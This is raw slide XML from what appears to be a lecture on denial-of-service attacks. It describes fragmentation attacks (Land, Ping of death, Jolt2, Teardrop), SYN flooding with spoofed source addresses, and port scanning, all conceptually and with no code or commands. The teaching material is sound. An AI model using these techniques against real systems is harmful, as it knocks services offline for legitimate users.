          <a:xfrm>
            <a:off x="2693988" y="6496050"/>
            <a:ext cx="1360487" cy="931863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>offset =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1480/8 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23561" name="Line 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4081463" y="6315075"/>
            <a:ext cx="5735637" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23562" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5283200" y="3124200"/>
            <a:ext cx="104775" cy="3124200"/>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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12141200" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D9BF0C7-635A-44B2-9C45-6AB02468208E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="762000"/>
            <a:ext cx="11703050" cy="16256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5100" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DoS: examples of vulnerability attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2514600"/>
            <a:ext cx="5775325" cy="6435725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Land:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sends spoofed packet with source and dest address/port the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ping of death:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sends oversized ping packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jolt2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sends a stream of fragments, none of which have offset of 0. Rebuilding consumes all processor capacity.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6578600" y="2438400"/>
            <a:ext cx="5775325" cy="6435725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Teardrop, Newtear, Bonk, Syndrop:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tools send overlapping segments, that is, fragment offsets incorrect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24582" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6469063" y="5953125"/>
            <a:ext cx="6040437" cy="2717800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patches fix the problem,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>but malformed packet </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacks continue to be </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>discovered.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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{775C25E9-8BC1-450F-B08C-2471F8A9AF84}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="838200"/>
            <a:ext cx="11703050" cy="1625600"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connection flooding: Overwhelming connection queue w/ SYN flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half"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0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recall client sends SYN packet with initial seq. number when initiating a connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP on server machine allocates memory on its connection queue, to track the status of the new half-open connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For each half-open connection, server waits for ACK segment, using a timeout that is often &gt; 1 minute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25605" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6578600" y="2514600"/>
            <a:ext cx="5775325" cy="6435725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" u="sng">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Send many SYN packets, filling connection queue with half-open connections. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can spoof source IP address!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When connection queue is exhausted, no new connections can be initiated by legit users. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25606" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7493000" y="7162800"/>
            <a:ext cx="4475163" cy="1423988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Need to know of open port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s machine: Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scanning.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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A6FBF05-941E-4EA7-B13D-560DA5E975AF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="762000"/>
            <a:ext cx="11703050" cy="16256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DoS: Overwhelming connection queue with SYN flood </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="26628" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6910388" y="5006975"/>
          <a:ext cx="869950" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s26690" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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0388" y="5006975"/>
                        <a:ext cx="869950" cy="741363"/>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6629" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2111375" y="3300413"/>
          <a:ext cx="868363" cy="741362"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s26691" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682"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375" y="3300413"/>
                        <a:ext cx="868363" cy="741362"/>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6630" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2144713" y="6067425"/>
          <a:ext cx="869950" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s26692" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682"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4713" y="6067425"/>
                        <a:ext cx="869950" cy="739775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26631" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6832600" y="5851525"/>
            <a:ext cx="1193800" cy="563563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26632" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1665288" y="4133850"/>
            <a:ext cx="1539875" cy="561975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26633" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2119313" y="7010400"/>
            <a:ext cx="1039812" cy="561975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349193" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3151188" y="3773488"/>
            <a:ext cx="3608387" cy="1281112"/>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349194" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1181875">
            <a:off x="3532188" y="3286125"/>
            <a:ext cx="2584450" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
